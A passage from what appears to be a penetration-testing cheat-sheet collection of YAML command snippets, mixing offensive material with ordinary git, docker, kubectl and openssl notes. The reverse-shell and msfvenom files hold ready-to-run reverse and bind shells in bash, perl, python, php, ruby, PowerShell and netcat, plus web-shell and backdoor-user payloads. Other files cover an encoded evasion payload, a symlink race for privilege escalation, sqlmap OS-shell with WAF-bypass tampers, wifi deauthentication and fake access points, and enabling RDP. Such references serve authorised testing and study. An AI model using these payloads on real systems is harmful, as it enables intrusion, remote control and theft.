  mona - Set a breakpoint on all current SEH Handler function pointers
  ```
  !mona bpseh
  ```

  mona - Find pointers to assist with SEH overwrite exploits (default: no aslr, no rebase, no safeseh)
  ```
  !mona seh
  ```

  mona - Badchar hunting step 1 - Creates a byte array
  ```
  !mona bytearray -cpb
  ```

  mona - Badchar hunting step 3 - compare until "!!! Hooray, normal shellcode unmodified !!!" message
  ```
  !mona compare -f -a
  ```

  mona - Finds gadgets that can be used in a ROP exploit and do ROP magic with them (Note : can take 20 minutes)
  ```
  !mona rop -cm aslr=false,rebase=false
  ```

  mona - Finds stackpivots (move stackpointer to controlled area)
  ```
  !mona stackpivot -cm os=true -distance
  ```

  mona - Show pointers to pointers to the pattern (might take a while !)
  ```
  !mona find -type file -s -p2p
  ```
--------------------------------------------------------------------------------
/files/Race Condition/racecondition.yaml:
--------------------------------------------------------------------------------
name: race condition
tags: [toctou, race condition]
data: |
  plateform/linux #target/local #cat/PRIVESC

  change a file by a symlink when found
  ```bash
  while true ; do N= ; if [[ -r $N ]] ; then rm $N ; ln -s $N ; break; fi ; done
  ```
--------------------------------------------------------------------------------
/files/ReverseShell/msfvenom.yaml:
--------------------------------------------------------------------------------
name: msfvenom
tags: [msfvenom, reverse shell]
data: |

  plateform/linux #target/local #cat/ATTACK/REVERSE_SHELL

  msfvenom payloads list
  ```
  msfvenom --list payloads
  ```

  msfvenom - payload windows x86 meterpreter unstaged
  ```
  msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
  ```

  Linux Meterpreter Reverse Shell
  ```
  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
  ```

  Windows Meterpreter Reverse TCP Shell
  ```
  msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
  ```

  Windows Reverse TCP Shell
  ```
  msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell.exe
  ```

32 | Windows Encoded Meterpreter Windows Reverse Shell 33 | ``` 34 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -e shikata_ga_nai -i 3 -f exe > encoded.exe 35 | ``` 36 | 37 | Mac Reverse Shell 38 | ``` 39 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 40 | ``` 41 | 42 | Web Payloads 43 | 44 | # PHP Meterpreter Reverse TCP 45 | ``` 46 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 47 | ``` 48 | 49 | ASP Meterpreter Reverse TCP 50 | ``` 51 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 52 | ``` 53 | 54 | JSP Java Meterpreter Reverse TCP 55 | ``` 56 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 57 | ``` 58 | 59 | WAR 60 | ``` 61 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 62 | ``` 63 | 64 | Scripting Payloads 65 | 66 | # Python Reverse Shell 67 | ``` 68 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 69 | ``` 70 | 71 | Bash Unix Reverse Shell 72 | ``` 73 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 74 | ``` 75 | 76 | Perl Unix Reverse shell 77 | ``` 78 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 79 | ``` 80 | 81 | msfvenom Shellcode 82 | 83 | Windows Meterpreter Reverse TCP Shellcode 84 | ``` 85 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 86 | ``` 87 | 88 | Linux Meterpreter Reverse TCP Shellcode 89 | ``` 90 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 91 | ``` 92 | 93 | Mac Reverse TCP Shellcode 94 | ``` 95 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 96 | ``` 97 | 98 | MCreate User 99 | ``` 100 | msfvenom -p windows/adduser USER=hacker PASS='Hacker123$' -f exe > adduser.exe 101 | ``` 102 | 103 | Metasploit Handler 104 | ``` 105 | msfconsole -x "use exploits/multi/handler; set lhost ; set lport ; set payload windows/meterpreter/reverse_tcp; exploit" 106 | ``` 107 | 
--------------------------------------------------------------------------------
/files/ReverseShell/nc.yaml:
--------------------------------------------------------------------------------
name: netcat
tags: [nc, netcat]
data: |

  plateform/linux #target/remote #cat/ATTACK/LISTEN-SERVE
  nc setup listener
  ```
  nc -nlvp
  ```

  nc bind shell windows
  plateform/windows
  ```
  nc -nlvp -e cmd.exe
  ```

  nc bind shell linux
  plateform/linux
  ```
  nc -nlvp -e /bin/bash
  ```

  nc reverse shell windows
  plateform/windows #cat/ATTACK/REVERSE_SHELL
  ```
  nc -nv -e cmd.exe
  ```

  nc reverse shell linux
  plateform/linux #cat/ATTACK/REVERSE_SHELL
  ```
  nc -nv -e /bin/bash
  ```

  nc transfer file - receiver
  plateform/linux #cat/ATTACK/FILE_TRANSFERT
  ```
  nc -nlvp >
  ```

  nc transfer file - sender
  plateform/linux #cat/ATTACK/FILE_TRANSFERT
  ```
  nc -nv <
  ```

  ncat

  % ncat

  ncat bind shell ssl filtered
  plateform/linux #cat/ATTACK/LISTEN-SERVE
  ```
  ncat --exec cmd.exe --allow -vnl --ssl
  ```

  ncat bind shell ssl connection
  plateform/linux #cat/ATTACK/LISTEN-SERVE
  ```
  ncat -v --ssl
  ```

  ncat HTTP WEB proxy
  plateform/linux #cat/ATTACK/LISTEN-SERVE
  ```
  ncat --listen --proxy-type http
  ```

--------------------------------------------------------------------------------
/files/ReverseShell/reverse_shell.yaml:
--------------------------------------------------------------------------------
name: reverse shell
tags: [reverseshell, reverse]
data: |
  plateform/linux #target/local #cat/ATTACK/REVERSE_SHELL

  bash reverse shell
  ```
  bash -i >& /dev/tcp// 0>&1
  ```

  perl reverse shell
  ```
  perl -e 'use Socket;$i="";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  ```

  python reverse shell
  ```
  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  ```

  php reverse shell
  ```
  php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");'
  ```

  ruby reverse shell
  ```
  ruby -rsocket -e'f=TCPSocket.open("",).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  ```

  [[java]] reverse shell
  ```java
  r = Runtime.getRuntime();p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp//;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);p.waitFor()
  ```

  [[Arsenal/Windows/powershell]] reverse shell
  ```powershell
  $client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  ```

  windows listener with autocompletion
  ```
  rlwrap nc -nlvp
  ```

  interactive reverse shell - (1) spawn a pty, then press Ctrl+Z
  ```
  python -c 'import pty; pty.spawn("/bin/bash")'
  ```

  interactive reverse shell - (2) on the listener side, then run fg
  ```
  stty raw -echo
  ```

  interactive reverse shell - (3) back in the reverse shell
  ```
  reset
  stty rows cols
  export TERM=xterm-256color
  ```

--------------------------------------------------------------------------------
/files/SQL Injection/sqlmap.yaml:
--------------------------------------------------------------------------------
name: SQLMAP
tags: [sql injection]
data: |
  plateform/linux #target/remote #cat/ATTACK/INJECTION #port/80 #port/443 #port/8080 #port/8443

  basic sqlmap step 1
  ```
  sqlmap -u -p --dbs
  ```

  basic sqlmap step 2
  ```
  sqlmap -u -p --dbms=
  ```

  basic sqlmap step 3
  ```
  sqlmap -u -p --dbms= -D --tables
  ```

  basic sqlmap step 4
  ```
  sqlmap -u -p --dbms= -D -T --columns
  ```

  basic sqlmap step 5
  ```
  sqlmap -u -p --dbms= -D -T -C --dump
  ```

  sqlmap - list dbs
  ```
  sqlmap -u --dbs
  ```

  sqlmap - list tables
  ```
  sqlmap -u -D --tables
  ```

  sqlmap - dump a table
  ```
  sqlmap -u -D -T --dump
  ```

  sqlmap - list columns of a table
  ```
  sqlmap -u -D -T --columns
  ```

  sqlmap - dump only some columns of a table
  ```
  sqlmap -u -D -T -C , --dump
  ```

  # sqlmap - get shell
  ```
  sqlmap -u --os-shell
  ```

  # sqlmap - file read
  ```
  sqlmap -u --file-read=
  ```

  # sqlmap - file write
  ```
  sqlmap -u --file-write= --file-dest=
  ```

  sqlmap - classic get
  ```
  sqlmap -u
  ```

  sqlmap - classic post
  ```
  sqlmap -u --data ""
  ```

  # sqlmap - get with cookie
  ```
  sqlmap -u --cookie=
  ```

  sqlmap - use a request file
  ```
  sqlmap -r
  ```

  # sqlmap - classic with tamper
  ```
  sqlmap -u '' --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
  ```

  sqlmap - hardcore
  ```
  sqlmap -u '' --level=5 --risk=3 -p '' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
  ```

  sqlmap - mysql tamper list
  ```
  sqlmap -u --dbms=MYSQL --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
  ```

  sqlmap - mssql tamper list
  ```
  sqlmap -u --dbms=MSSQL --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
  ```
--------------------------------------------------------------------------------
/files/Scan/nmap.yaml:
--------------------------------------------------------------------------------
name: nmap
tags: [nmap]
data: |

  nmap - hosts alive
  ```
  nmap -sn
  ```

  nmap - classic scan
  ```
  nmap -sC -sV
  ```

  nmap - read targets from a file
  ```
  nmap -iL
  ```

  nmap - classic scan + save
  ```
  nmap -sC -sV -oA
  ```

  nmap - quick scan top ports 100
  ```
  nmap --top-ports 100 --open -sV
  ```

  nmap - big top ports 5000
  ```
  nmap --top-ports 5000 --open -sV
  ```

  nmap - full port
  ```
  nmap -p- -sV
  ```

  nmap - host with a given port
  ```
  nmap -p --open
  ```

  nmap - FULL
  ```
  IP=;
  ports=$(nmap -p- --min-rate=1000 -n -T4 $IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//);
  nmap -Pn -sC -sV -p$ports $IP -oN scan.txt --reason --script=vuln
  ```

  nmap - udp scan
  ```
  nmap -sU
  ```

  nmap - low rate classic
  ```
  nmap --max-rate 100 -sC -sV
  ```

  masscan - full port
  ```
  masscan -p 1-65535 -e --rate=1000
  ```

  nmap - SMB signing disabled
  ```
  nmap -Pn -sS -T4 --open --script smb-security-mode -p445
  ```

  nmap behind proxy - tcp connect (-sT) - no dns (-n)
  ```
  proxychains nmap -n -sT -sV -Pn --open -oA -iL
  ```

--------------------------------------------------------------------------------
/files/Services/service.yaml:
--------------------------------------------------------------------------------
name: Service
tags: [service]
data: |

  List services
  ```
  service --status-all
  ```

  Status of a service
  ```
  service status
  ```

  Start a service
  ```
  service start
  ```

  Stop a service
  ```
  service stop
  ```

  Restart a service
  ```
  service restart
  ```
--------------------------------------------------------------------------------
/files/Services/systemctl.yaml:
--------------------------------------------------------------------------------
name: systemctl
tags: [systemctl, service]
data: |
  plateform/linux #target/local #cat/UTILS

  Start service
  ```
  systemctl start
  ```

  Stop service
  ```
  systemctl stop
  ```

  Enable service
  ```
  systemctl enable
  ```

  Disable service
  ```
  systemctl disable
  ```

  Restart service
  ```
  systemctl restart
  ```

  Reload service
  ```
  systemctl reload
  ```

  Service status
  ```
  systemctl status
  ```

  List running services
  ```
  systemctl list-units --type=service --state=running
  ```

  List enabled services
  ```
  systemctl list-unit-files --type=service --state=enabled
  ```

  List disabled services
  ```
  systemctl list-unit-files --type=service --state=disabled
  ```

  $ service_inactive: systemctl list-units --type=service --state=inactive | awk '{print $1}' | grep .service | sed 's/.service$//'
  $ service_active: systemctl list-units --type=service --state=active | awk '{print $1}' | grep .service | sed 's/.service$//'
  $ service_enabled: systemctl list-unit-files --type=service --state=enabled | awk '{print $1}' | grep .service | sed 's/.service$//'
  $ service_disabled: systemctl list-unit-files --type=service --state=disabled | awk '{print $1}' | grep .service | sed 's/.service$//'
  $ service: systemctl list-units --type=service --all | awk '{print $1}' | grep .service | sed 's/.service$//'
--------------------------------------------------------------------------------
/files/Tools/docker.yaml:
--------------------------------------------------------------------------------
name: Docker
tags: [docker, container]
data: |

  plateform/multiple #target/local #cat/UTILS

  Remove an image
  docker image rm

  Delete an image from the local image store
  docker rmi

  List all images that are locally stored with the Docker engine
  docker images

  Build an image from the Dockerfile in the current directory and tag the image
  docker build -t : .

  Pull an image from a registry
  docker pull :

  Stop a running container through SIGTERM
  docker stop

  Stop a running container through SIGKILL
  docker kill

  List the networks
  docker network ls

  List the running containers
  docker ps

  Delete all running and stopped containers
  docker rm -f $(docker ps -aq)

  Create a new bash process inside the container and connect it to the terminal
  docker exec -it bash

  Print the last lines of a container's logs
  docker logs --tail 100 | less

  Print the last lines of a container's logs and follow its logs
  docker logs --tail 100 -f

  Create new network
  docker network create

  $ image_id: docker images --- --headers 1 --column 3
  $ container_id: docker ps --- --headers 1 --column 1



  % docker-compose

  Builds, (re)creates, starts, and attaches to containers for all services
  docker-compose up

  Builds, (re)creates, and starts containers for all services in detached mode
  docker-compose up -d

  Builds, (re)creates, starts, and attaches to containers for a service
  docker-compose up

  Builds, (re)creates, and starts containers for a service in detached mode
  docker-compose up -d

  Print the last lines of a service's logs
  docker-compose logs --tail 100 | less

  Print the last lines of a service's logs and follow its logs
  docker-compose logs -f --tail 100

  Stops containers and removes containers and networks created by up
  docker-compose down

  % docker, mysql
  run mysql container
  docker run --rm --name= -e MYSQL_ALLOW_EMPTY_PASSWORD=yes -d mysql/mysql-server:

  connect to mysql docker container
  docker exec -ti mysql
--------------------------------------------------------------------------------
/files/Tools/git.yaml:
--------------------------------------------------------------------------------
name: git
tags: [git]
data: |

  Set global git user name
  ```
  git config --global user.name
  ```

  Set global git user email
  ```
  git config --global user.email
  ```

  Initializes a git repository
  ```
  git init
  ```

  Clone a git repository
  ```
  git clone -b
  ```

  View all available remotes for a git repository
  ```
  git remote --verbose
  ```

  Adds a remote for a git repository
  ```
  git remote add
  ```

  Renames a remote for a git repository
  ```
  git remote rename
  ```

  Remove a remote for a git repository
  ```
  git remote remove
  ```

  Checkout a branch
  ```
  git checkout
  ```

  Displays the current status of a git repository
  ```
  git status
  ```

  Displays unstaged changes for a file
  ```
  git diff
  ```

  Stage single or multiple files
  ```
  git add ;
  ```

  Stage all files in project
  ```
  git add -A
  ```

  Saves the staged changes in a commit with a message
  ```
  git commit -m
  ```

  Pushes committed changes to a remote repository
  ```
  git push -u
  ```

  Pushes changes to a remote repository, onto another branch
  ```
  git push :
  ```

  Overwrites remote branch with local branch changes
  ```
  git push -f
  ```

  Pulls changes from a remote repo into the local repo
  ```
  git pull --ff-only
  ```

  Merges changes on one branch into current branch
  ```
  git merge
  ```

  Abort the current conflict resolution process, and try to reconstruct the pre-merge state.
  ```
  git merge --abort
  ```

  Displays log of commits for a repo
  ```
  git log
  ```

  Displays formatted log of commits for a repo
  ```
  git log --all --decorate --oneline --graph
  ```

  Clear everything (remove untracked and ignored files and directories)
  ```
  git clean -dxf
  ```

  Sign all commits in a branch based on master
  ```
  git rebase master -S -f
  ```

  Checkout a branch from a fork
  ```
  git fetch origin pull//head:pr/ && git checkout pr/
  ```

  Add a new module
  ```
  git submodule add
  ```

  Update module
  ```
  git submodule update --init
  ```

  Update module without init
  ```
  git submodule update
  ```

  Pull all submodules
  ```
  git submodule foreach git pull origin master
  ```

  Update all submodules
  ```
  git submodule update --init --recursive
  ```

  Skip git hooks
  ```
  git commit --no-verify
  ```

  Create new branch from current HEAD
  ```
  git checkout -b
  ```

  pull remote branch and switch to it
  ```
  git checkout -b /
  ```

  git dump
  ```
  gitdumper /.git/
  ```

  = remote: origin
--------------------------------------------------------------------------------
/files/Tools/kubernetes.yaml:
--------------------------------------------------------------------------------
name: kubernetes
tags: [kubernetes, k8s, kubectl]
data: |

  plateform/linux #target/local #cat/UTILS

  Print all contexts
  ```
  kubectl config get-contexts
  ```

  Print current context of kubeconfig
  ```
  kubectl config current-context
  ```

  Set context of kubeconfig
  ```
  kubectl config use-context
  ```

  Print resource documentation
  ```
  kubectl explain
  ```

  Get nodes (add option '-o wide' for details)
  ```
  kubectl get nodes
  ```

  Get namespaces
  ```
  kubectl get namespaces
  ```

  Get pods from namespace (add option '-o wide' for details)
  ```
  kubectl get pods -n
  ```

  Get pods from all namespaces (add option '-o wide' for details)
  ```
  kubectl get pods --all-namespaces
  ```

  Get services from namespace
  ```
  kubectl get services -n
  ```

  Get details from resource on namespace
  ```
  kubectl describe / -n
  ```

  Print (and follow) logs of a pod in a namespace
  ```
  kubectl logs -f pods/ -n
  ```

  Get deployments
  ```
  kubectl get deployments -n
  ```

  Edit deployments
  ```
  kubectl edit deployment/ -n
  ```

  Drain node in preparation for maintenance
  ```
  kubectl drain
  ```

  Mark node as schedulable
  ```
  kubectl uncordon
  ```

  Mark node as unschedulable
  ```
  kubectl cordon
  ```

  Display resource (cpu/memory/storage) usage
  ```
  kubectl top
  ```
--------------------------------------------------------------------------------
/files/Web/drupwn.yaml:
--------------------------------------------------------------------------------
name: drupwn
tags: [drupal, drupwn]
data: |

  plateform/linux #target/remote #cat/RECON

  drupwn classic
  ```
  drupwn --users --nodes --modules --dfiles --themes enum
  ```

  drupwn, docker
  ```
  sudo docker run --rm -it immunit/drupwn --users --nodes --modules --dfiles --themes enum
  ```

--------------------------------------------------------------------------------
/files/Web/fuzzer.yaml:
--------------------------------------------------------------------------------
name: gobuster
tags: [fuzzer, fuzz, gobuster]
data: |

  plateform/linux #target/remote #cat/ATTACK/FUZZ
  gobuster scan classic
  ```
  gobuster dir -u -w
  ```

  gobuster scan pentest classic fuzz
  ```
  gobuster dir -u -w -x json,html,php,txt,xml,md
  ```

  gobuster scan high rate
  ```
  gobuster dir -u -w -t 30
  ```

  gobuster scan with added extensions
  ```
  gobuster dir -u -w -x json,html,php,txt
  ```

  wfuzz

  % fuzzer, fuzz, wfuzz
  plateform/linux #target/remote #cat/ATTACK/FUZZ
  wfuzz with a number range in the url ( url : http://site/ )
  ```
  wfuzz -z range,1-1000 -u FUZZ
  ```

  wfuzz with a wordlist in the url ( url : http://site/ )
  ```
  wfuzz -z file, -u FUZZ
  ```

  wfuzz on post parameter
  ```
  wfuzz -z file, -X post -u -d 'FUZZ=1'
  ```

  Dirb

  % fuzzer, fuzz, dirb
  plateform/linux #target/remote #cat/ATTACK/FUZZ
  dirb with the common wordlist
  ```
  dirb -w /usr/share/wordlists/dirb/common.txt
  ```

  ffuf

  % fuzzer, fuzz, ffuf
  plateform/linux #target/remote #cat/ATTACK/FUZZ
  ffuf fuzz keyword in url
  ```
  ffuf -w -u /FUZZ
  ```

  ffuf fuzz the Host header, filter by response size
  ```
  ffuf -w -u -H "Host: FUZZ" -fs
  ```

  ffuf GET parameter fuzzing
  ```
  ffuf -w -u ?=FUZZ -fs
  ```

  ffuf POST parameter fuzzing and filter response code 401
  ```
  ffuf -w -u -X POST -d "username=admin\&password=FUZZ" -fc 401
  ```

  = wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
--------------------------------------------------------------------------------
/files/Web/jwttool.yaml:
--------------------------------------------------------------------------------
name: JwtTool
tags: [jwttool, token, jwt]
data: |

  Jwt tool Mode all tests
  plateform/linux #target/remote #cat/RECON
  ```
  python3 jwt_tool.py -M at -t "" -rh "Authorization: Bearer " -rh "" -rc ""
  ```

  Jwt tool reuse a query by id
  plateform/linux #target/remote #cat/RECON
  ```
  python3 jwt_tool.py -Q ""
  ```

  Jwt tool bruteforce the key with a dictionary
  plateform/linux #target/local #cat/RECON
  ```
  python3 jwt_tool.py -d
  ```

--------------------------------------------------------------------------------
/files/Web/openssl.yaml:
--------------------------------------------------------------------------------
name: openssl
tags: [openssl, certificate, encryption]
data: |

  plateform/linux #target/local #cat/UTILS

  Create a new signing request and key
  ```
  openssl req -new -newkey rsa: -nodes -out -keyout
  ```

  Create a new self-signed certificate
  ```
  openssl req -x509 -sha256 -nodes -days -newkey rsa: -out -keyout
  ```

  Create a signing request from an existing key
  ```
  openssl req -out -key -new
  ```

  Create a signing request from an existing certificate and key
  ```
  openssl x509 -x509toreq -out -in -signkey
  ```

  Remove a passphrase from a private key
  ```
  openssl rsa -in -out
  ```

  Convert a DER encoded file to a PEM encoded file
  ```
  openssl x509 -inform der -in -out
  ```

  Convert a PEM encoded file to a DER encoded file
  ```
  openssl x509 -outform der -in -out
  ```

  Convert a PKCS12 encoded file containing a private key and certificates to PEM
  ```
  openssl pkcs12 -in -out -nodes
  ```

  Extract the private key from a PKCS12 encoded file
  ```
  openssl pkcs12 -in -out -nodes -nocerts
  ```

  Extract the certificate from a PKCS12 encoded file
  ```
  openssl pkcs12 -in -out -nodes -nokeys
  ```

  Convert a PEM certificate file and a private key to a PKCS12 encoded file
  ```
  openssl pkcs12 -export -out -inkey -in -certfile
  ```

  Validate a certificate signing request
  ```
  openssl req -text -noout -verify -in
  ```

  Validate a private key
  ```
  openssl rsa -in -check
  ```

  Validate a certificate
  ```
  openssl x509 -in -text -noout
  ```

  Validate a PKCS12 file (.pfx or .p12)
  ```
  openssl pkcs12 -info -in
  ```

  Compare the MD5 hash of a certificate's modulus
  ```
  openssl x509 -noout -modulus -in | openssl md5
  ```

  Compare the MD5 hash of a private key's modulus
  ```
  openssl rsa -noout -modulus -in | openssl md5
  ```

  Compare the MD5 hash of a certificate signing request's modulus
  ```
  openssl req -noout -modulus -in | openssl md5
  ```

  Display the server certificate chain
  ```
  openssl s_client -connect :
  ```
--------------------------------------------------------------------------------
/files/Web/tomcat.yaml:
--------------------------------------------------------------------------------
name: Tomcat
tags: [tomcat]
data: |

  tomcat manager bruteforce
  plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY
  ```
  msfconsole -x "use auxiliary/scanner/http/tomcat_enum"
  ```

  tomcat deploy
  plateform/linux #target/remote #cat/ATTACK/EXPLOIT
  ```
  msfconsole -x "use exploit/multi/http/tomcat_mgr_deploy"
  ```
--------------------------------------------------------------------------------
/files/Web/web.yaml:
--------------------------------------------------------------------------------
name: WEB
tags: [web]
data: |

  extract links from an url
  plateform/linux #target/remote #cat/RECON
  ```
  curl -k -s | grep -o 'http://[^"]*' | cut -d "/" -f 3 | sort -u
  ```
--------------------------------------------------------------------------------
/files/Web/wpscan.yaml:
--------------------------------------------------------------------------------
name: WPSCAN
tags: [wpscan, wordpress]
data: |

  plateform/linux #target/remote #cat/RECON
  wpscan with docker and burp proxy
  ```
  sudo docker run -it --network host --rm wpscanteam/wpscan --proxy http://127.0.0.1:8080 --url --disable-tls-checks -e ap,tt,cb,dbe,u1-20,m --api-token
  ```
--------------------------------------------------------------------------------
/files/Wifi/wifi.yaml:
--------------------------------------------------------------------------------
name: wifi
tags: [wifi]
data: |

  airmon - start interface
  ```
  airmon-ng start wlan0
  ```

  airodump - listen to everything
  ```
  airodump-ng wlan0mon
  ```

  airodump - listen to a specific SSID
  ```
  airodump-ng --bssid -c -w wlan0mon
  ```

  aireplay - deauth clients
  ```
  aireplay-ng --deauth 5 -c -a wlan0mon
  ```

  aircrack - crack handshake for PSK
  ```
  aircrack-ng -w
  ```

  hostapd-wpe - launch fake AP
  ```
  hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
  ```
--------------------------------------------------------------------------------
/files/Windows/forfiles.yaml:
--------------------------------------------------------------------------------
name: forfiles
tags: [forfiles,forfile,for]
data: |

  @FILE - The file name.
  @FNAME - The file name without extension.
  @EXT - The file extension.
  @PATH - The full path of the file.
  @RELPATH - The relative path of the file.
  @ISDIR - Evaluates to TRUE if the file type is a directory; otherwise this variable evaluates to FALSE.
  @FSIZE - The file size, in bytes.
  @FDATE - The last-modified date stamp of the file.
  @FTIME - The last-modified time stamp of the file.

  # List the absolute path of a given file on drive D

  forfiles /P D:\ /S /M logo.png /C "cmd /c echo @path"

  # List all batch files on drive C

  forfiles /P c:\ /S /M *.bat /C "cmd /c echo @file is a batch file"

  # List all directories on drive C

  forfiles /P c:\ /S /M * /C "cmd /c if @isdir==TRUE echo @file is a directory"

  # List every file in the current directory older than January 1, 2007

  forfiles /S /M *.* /D -01/01/2007 /C "cmd /c echo @file is outdated."

--------------------------------------------------------------------------------
/files/Windows/netsh.yaml:
--------------------------------------------------------------------------------
name: netsh
tags: [netsh,net]
data: |

  # Since Windows XP, Windows has had built-in network port forwarding. Any incoming TCP connection (IPv4 or IPv6) to a local port can be redirected to another local port, or to a port on a remote computer, and the system does not need a dedicated service listening on that port.

  Netsh interface portproxy add v4tov4 listenport=7772 connectaddress=192.168.174.129 connectport=8065

  netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

  - listenaddress - the local IP address on which to wait for connections.
  - listenport - the local TCP port on which to listen.
  - connectaddress - the local or remote IP address (or DNS name) to which incoming connections are redirected.

  # Important: make sure the firewall (Windows Firewall or a third-party firewall, usually bundled with antivirus software) allows incoming connections to the new port. If necessary, a new Windows Firewall rule can be added with the following command:


  netsh advfirewall firewall add rule name="forwarded_RDPport_3340" protocol=TCP dir=in localip=10.1.1.110 localport=3340 action=allow

  # Show the list of forwarding rules on the system:

  netsh interface portproxy show all

  # Delete a specific port forwarding rule:

  netsh interface portproxy delete v4tov4 listenport=3340 listenaddress=10.1.1.110

  # Delete all current port forwarding rules:

  netsh interface portproxy reset
--------------------------------------------------------------------------------
/files/Windows/openrdp.yaml:
--------------------------------------------------------------------------------
name: openrdp
tags: [openrdp,rdp]
data: |

  # Registry

  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

  # WMIC

  wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

  # Win2008 Open 3389

  WMIc /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1

  WMIc /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1

  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

  # Enable Remote Desktop on a remote computer

  wmic /node:%pcname% /USER:%pcaccount% PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

  wmic /namespace:\\root\CIMV2\TerminalServices PATH Win32_TerminalServiceSetting WHERE (__CLASS !="") CALL

  # Winxp/7 Open 3389

  WMIc /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
--------------------------------------------------------------------------------
/files/Windows/powercfg.yaml:
--------------------------------------------------------------------------------
name: powercfg
tags: [power,powercfg]
data: |

  # Turn off hibernation

  powercfg -h off
--------------------------------------------------------------------------------
/files/Windows/powershell.yaml:
--------------------------------------------------------------------------------
name: powershell
tags: [powershell]
data: |

  Get deleted Active Directory objects (AD Recycle Bin)
  ```
  Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
  ```

  Get process
  ```
  Get-Process
  ```
--------------------------------------------------------------------------------
/files/Windows/schtasks.yaml:
--------------------------------------------------------------------------------
name: schtasks
tags: [schtasks,sch]
data: |

  # Create a scheduled task - run every 20 minutes
  # The following command schedules C:\Windows\program.exe to run every 20 minutes. Because the command includes no start date or time, the task starts 20 minutes after the command completes and then runs every 20 minutes whenever the system is running.

  schtasks /create /sc minute /mo 20 /tn "Security script" /tr C:\Windows\program.exe

  # Run at a specified time
  # The following command schedules C:\Windows\program.exe to run once at 02:17 with SYSTEM privileges.

  schtasks /create /sc once /st 02:17 /tn Program /tr "C:\Windows\program.exe" /ru system

  # Run at five minutes past every hour
